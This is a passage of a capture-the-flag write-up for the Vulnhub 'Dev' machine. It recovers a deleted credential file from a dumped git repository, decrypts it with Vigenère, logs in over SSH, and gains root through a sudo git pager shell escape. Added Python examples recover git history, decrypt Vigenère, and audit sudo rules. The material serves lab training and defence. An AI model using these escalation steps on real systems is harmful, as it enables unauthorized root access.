Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at f9e2a36 First commit :)
                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ git log                                              
commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737 (HEAD)
Author: User <f3dai@dev.local>
Date:   Mon Oct 12 23:43:00 2020 +0100

    First commit :)

After the checkout, a file named `cred` that is absent from HEAD is back in the working tree:

┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ cat cred       
D1yceX0jgixhk (slime)
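Added example, not code from the write-up or from git-dumper: a minimal reader/writer for git loose objects, the `objects/XX/YYYY…` files that git-dumper fetched one by one above. It builds a constructed two-commit history in memory (only the cred line is the value from the target; the index.html content and the timestamp are made up) and then walks it the way an analyst walks a dumped repo: for every commit, compare its tree with its parent's and report each file the commit removed, reading the blob straight out of the object store. This is the general form of the checkout done above: deleting a file in a later commit never deletes its blob, so every object the dumper retrieved is readable content.

```python
# Added example: git loose-object format and recovery of deleted files from history.
from __future__ import annotations

import hashlib
import zlib


def loose_path(sha: str) -> str:
    """Where git keeps a loose object on disk (and where git-dumper fetched it from)."""
    return f".git/objects/{sha[:2]}/{sha[2:]}"


def hash_object(obj_type: str, data: bytes) -> tuple[str, bytes]:
    """Loose object = zlib('<type> <len>\\0<data>'); the SHA-1 covers the uncompressed form."""
    raw = f"{obj_type} {len(data)}".encode() + b"\x00" + data
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def read_object(store: dict[str, bytes], sha: str) -> tuple[str, bytes]:
    """Inverse of hash_object: decompress, then split the header from the payload."""
    header, _, data = zlib.decompress(store[sha]).partition(b"\x00")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(data):
        raise ValueError(f"corrupt object {sha}")
    return obj_type, data


def make_tree(entries: dict[str, str]) -> bytes:
    """Flat tree of regular files, {name: blob_sha}. Git stores entries sorted by name,
    each as '<mode> <name>\\0' followed by the 20 raw SHA-1 bytes (not hex)."""
    return b"".join(
        b"100644 " + name.encode() + b"\x00" + bytes.fromhex(entries[name])
        for name in sorted(entries)
    )


def parse_tree(data: bytes) -> dict[str, str]:
    entries, i = {}, 0
    while i < len(data):
        nul = data.index(b"\x00", i)
        _mode, name = data[i:nul].decode().split(" ", 1)
        entries[name] = data[nul + 1:nul + 21].hex()
        i = nul + 21
    return entries


def make_commit(tree: str, parent: str | None, message: str) -> bytes:
    ident = "User <f3dai@dev.local> 1602542580 +0100"  # constructed timestamp
    lines = [f"tree {tree}"] + ([f"parent {parent}"] if parent else [])
    lines += [f"author {ident}", f"committer {ident}", "", message]
    return ("\n".join(lines) + "\n").encode()


def parse_commit(data: bytes) -> dict:
    header, _, message = data.decode().partition("\n\n")
    info: dict = {"parents": [], "message": message.strip()}
    for line in header.splitlines():
        key, _, value = line.partition(" ")
        if key == "parent":
            info["parents"].append(value)
        else:
            info[key] = value
    return info


def deleted_files(store: dict[str, bytes], head: str) -> list[tuple[str, str, bytes]]:
    """Walk first-parent history from head. For each commit, report files present in the
    parent's tree but absent from the commit's tree, with the blob content that is still
    in the object store (a delete only drops the tree entry, never the blob)."""
    findings, sha = [], head
    while True:
        commit = parse_commit(read_object(store, sha)[1])
        if not commit["parents"]:
            return findings
        parent_sha = commit["parents"][0]
        parent = parse_commit(read_object(store, parent_sha)[1])
        now = parse_tree(read_object(store, commit["tree"])[1])
        before = parse_tree(read_object(store, parent["tree"])[1])
        for name, blob in before.items():
            if name not in now:
                findings.append((sha[:7], name, read_object(store, blob)[1]))
        sha = parent_sha


def build_demo_store() -> tuple[dict[str, bytes], str]:
    """Constructed history mirroring the write-up: 'cred' exists in 'First commit :)' and is
    gone in 'updated: removed file'. Only the cred line is the real value from the target."""
    store: dict[str, bytes] = {}

    def put(obj_type: str, data: bytes) -> str:
        sha, packed = hash_object(obj_type, data)
        store[sha] = packed
        return sha

    index_sha = put("blob", b"<html>dev site placeholder</html>\n")  # constructed
    cred_sha = put("blob", b"D1yceX0jgixhk (slime)\n")
    tree1 = put("tree", make_tree({"index.html": index_sha, "cred": cred_sha}))
    c1 = put("commit", make_commit(tree1, None, "First commit :)"))
    tree2 = put("tree", make_tree({"index.html": index_sha}))
    c2 = put("commit", make_commit(tree2, c1, "updated: removed file"))
    return store, c2


if __name__ == "__main__":
    store, head = build_demo_store()
    for commit, name, content in deleted_files(store, head):
        print(f"commit {commit} removed {name}; recovered content: {content!r}")
```

Against a real dump, `store` would be filled from the `.git/objects/XX/YYYY` files (`loose_path` shows the mapping), while packed objects under `.git/objects/pack` need git itself. The same result in the dumped repo without any custom code is `git log --diff-filter=D --name-only` to list deleted paths, then `git show <commit>^:<path>` to print each one from the parent commit, which avoids the detached-HEAD checkout.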

The git log also gives a likely username: the committer e-mail is f3dai@dev.local, so f3dai.

Note that D1yceX0jgixhk is not the password itself. Nothing on the box names the scheme, but the word in parentheses, slime, works as a Vigenère key: decrypting D1yceX0jgixhk with key slime (letters shifted, the digits left untouched) gives L1nusT0rvalds.

An online Vigenère tool does the job, for example:

https://www.cs.du.edu/~snarayan/crypt/vigenere.html
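Added example (not part of the original write-up): a small Vigenère implementation that reproduces the decryption above offline, plus a parser for the `<ciphertext> (<key>)` layout of the recovered cred file. It follows the convention the online tool uses, which is the one that yields L1nusT0rvalds: only letters are shifted, case is preserved, and non-letters such as the digits pass through without consuming a key character. Tools differ on that last point, so the `advance_on_nonalpha` switch tries the other convention as well; the wrong one produces garbage, which is the usual first hurdle when a hint only says "Vigenère".

```python
# Added example: Vigenère encrypt/decrypt with both common key-advance conventions.
import re


def _shift_text(text: str, key: str, sign: int, advance_on_nonalpha: bool) -> str:
    """Shared worker: sign=+1 encrypts, sign=-1 decrypts. Only ASCII letters are shifted
    and case is preserved. By default (the du.edu tool's behaviour) a non-letter such as
    '1' or '0' does NOT consume a key character; some tools advance the key anyway."""
    if not (key.isascii() and key.isalpha()):
        raise ValueError("key must be ASCII letters only")
    key = key.lower()
    out, k = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)]) - ord("a")
            out.append(chr((ord(ch) - base + sign * shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
            if advance_on_nonalpha:
                k += 1
    return "".join(out)


def vigenere_decrypt(ciphertext: str, key: str, advance_on_nonalpha: bool = False) -> str:
    return _shift_text(ciphertext, key, -1, advance_on_nonalpha)


def vigenere_encrypt(plaintext: str, key: str, advance_on_nonalpha: bool = False) -> str:
    return _shift_text(plaintext, key, +1, advance_on_nonalpha)


# Layout of the recovered cred file: "<ciphertext> (<key>)".
CRED_LINE_RE = re.compile(r"^\s*(?P<cipher>\S+)\s*\((?P<key>[A-Za-z]+)\)\s*$")


def decrypt_cred_line(line: str) -> dict:
    """Parse a cred line and decrypt it under both key conventions, so the operator
    can pick the readable candidate instead of guessing which tool the author used."""
    m = CRED_LINE_RE.match(line)
    if not m:
        raise ValueError(f"unexpected cred format: {line!r}")
    return {
        "key_pauses_on_nonalpha": vigenere_decrypt(m["cipher"], m["key"]),
        "key_advances_on_nonalpha": vigenere_decrypt(m["cipher"], m["key"], True),
    }


if __name__ == "__main__":
    for convention, candidate in decrypt_cred_line("D1yceX0jgixhk (slime)").items():
        print(f"{convention}: {candidate}")
```

Only one of the two candidates reads as a name, which is how the convention is confirmed; in a real engagement the SSH attempt is the final check.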

SSH in as f3dai with the recovered password (the first attempt below was a typo; the second succeeds):

┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ ssh f3dai@192.168.56.183
The authenticity of host '192.168.56.183 (192.168.56.183)' can't be established.
ED25519 key fingerprint is SHA256:YvfP9x0HRPWzLXji10/dn8yuYFgbVGNeO2/z1azmFwE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.183' (ED25519) to the list of known hosts.
f3dai@192.168.56.183's password: 
Permission denied, please try again.
f3dai@192.168.56.183's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sun Sep 27 13:18:16 2020 from 192.168.145.10
f3dai@dev:~$ id
uid=1000(f3dai) gid=1000(f3dai) groups=1000(f3dai),4(adm),24(cdrom),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
f3dai@dev:~$ ls -alh
total 80K
drwxr-xr-x 16 f3dai f3dai 4.0K Sep 26  2020 .
drwxr-xr-x  3 root  root  4.0K Sep 26  2020 ..
lrwxrwxrwx  1 f3dai f3dai    9 Sep 26  2020 .bash_history -> /dev/null
-rw-r--r--  1 f3dai f3dai  220 Sep 26  2020 .bash_logout
-rw-r--r--  1 f3dai f3dai 3.7K Sep 26  2020 .bashrc
drwx------ 12 f3dai f3dai 4.0K Sep 26  2020 .cache
drwxr-xr-x 11 f3dai f3dai 4.0K Sep 26  2020 .config
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Desktop
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Documents
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Downloads
drwx------  3 f3dai f3dai 4.0K Sep 26  2020 .gnupg
drwxr-xr-x  3 f3dai f3dai 4.0K Sep 26  2020 .local
drwx------  5 f3dai f3dai 4.0K Sep 26  2020 .mozilla
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Music
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Pictures
-rw-r--r--  1 f3dai f3dai  807 Sep 26  2020 .profile
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Public
drwx------  2 f3dai f3dai 4.0K Sep 26  2020 .ssh
-rw-r--r--  1 f3dai f3dai    0 Sep 26  2020 .sudo_as_admin_successful
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Templates
-rw-rw-r--  1 f3dai f3dai   33 Sep 26  2020 user.txt
drwxr-xr-x  2 f3dai f3dai 4.0K Sep 26  2020 Videos
f3dai@dev:~$ cat user.txt
9f348b50811eec6d89d7213ec6cb4c38
f3dai@dev:~$ 

That is the user flag. Note also that the id output lists f3dai in the lxd group; lxd membership is itself a well-known route to root through a privileged container, independent of the sudo rule exploited below.

Privilege escalation

f3dai@dev:~$ sudo -l
Matching Defaults entries for f3dai on dev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User f3dai may run the following commands on dev:
    (root) NOPASSWD: /usr/bin/git
f3dai@dev:~$ 

Running git as root without a password is enough to escalate. GTFOBins documents several shell escapes for git under sudo; the one used here goes through the pager: run a git subcommand that pages its output (for example `sudo git -p help config`), then type `!/bin/sh` at the less prompt, and less spawns the shell as root:

!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 32K
drwx------  4 root root 4.0K Sep 26  2020 .
drwxr-xr-x 20 root root 4.0K Sep 26  2020 ..
lrwxrwxrwx  1 root root    9 Sep 26  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jul 31  2020 .cache
-rw-------  1 root root   54 Sep 26  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Sep 26  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   33 Sep 26  2020 root.txt
# cat root.txt
37c24213df088bb485e97b7ce1929e09

That is the root flag.
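Added example (not from the write-up): a `sudo -l` parser and auditor that turns output like the one above into findings. It is the check a pentester or defender runs across many hosts: parse each rule after the "may run the following commands" banner, split comma-separated command lists, record tags such as NOPASSWD, and flag rules that run as root (or ALL) and grant either ALL or a binary for which GTFOBins documents a shell escape. The sample input is the rule shown on the target; the list of escape-capable binaries is a hand-picked subset from memory, not a complete GTFOBins export, so extend it for your own estate.

```python
# Added example: audit `sudo -l` output for rules that hand over a root shell.
import os
import re

# Binaries GTFOBins documents with a sudo shell escape (hand-picked subset from memory;
# not exhaustive). Matching is on the basename of the first token of each command.
SHELL_ESCAPE_BINARIES = {
    "git", "less", "more", "man", "vi", "vim", "nano", "find", "awk", "gawk",
    "python", "python3", "perl", "ruby", "env", "bash", "sh", "zsh", "tar",
    "zip", "ftp", "ssh", "tcpdump", "nmap", "journalctl", "systemctl",
}

# The rule shown on the target in the write-up.
SUDO_L_OUTPUT = r"""Matching Defaults entries for f3dai on dev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User f3dai may run the following commands on dev:
    (root) NOPASSWD: /usr/bin/git
"""

# "(runas[:group]) TAG: TAG: cmd1, cmd2 ..."; tags are optional and each ends in a colon.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per rule line after the 'may run the following commands' banner.
    Commands are split on commas (a comma inside an argument would need quoting in sudoers
    and is not handled here)."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"([A-Z_]+):", m["tags"]))
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append({"runas": m["runas"].strip(), "tags": tags, "commands": cmds})
    return rules


def audit_sudo_l(text: str) -> list:
    """Flag commands that are ALL or whose binary has a documented shell escape. The runas
    user is root when the rule says (root) or (ALL ...); NOPASSWD is recorded because it
    removes the last hurdle, as it did on this box."""
    findings = []
    for rule in parse_sudo_l(text):
        runas_root = rule["runas"].split(":")[0].strip() in ("root", "ALL")
        for cmd in rule["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append({
                    "command": cmd,
                    "binary": binary,
                    "runas_root": runas_root,
                    "nopasswd": "NOPASSWD" in rule["tags"],
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"{f['binary']:10} root={f['runas_root']} nopasswd={f['nopasswd']}  {f['command']}")
```

The fix on the defensive side is the same regardless of tooling: a sudo rule for an interactive binary such as git is a root shell, so either drop the rule or restrict it to a wrapper script that runs one fixed, non-paging command.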

Posted 2022-11-17 16:13 by Jason_huawen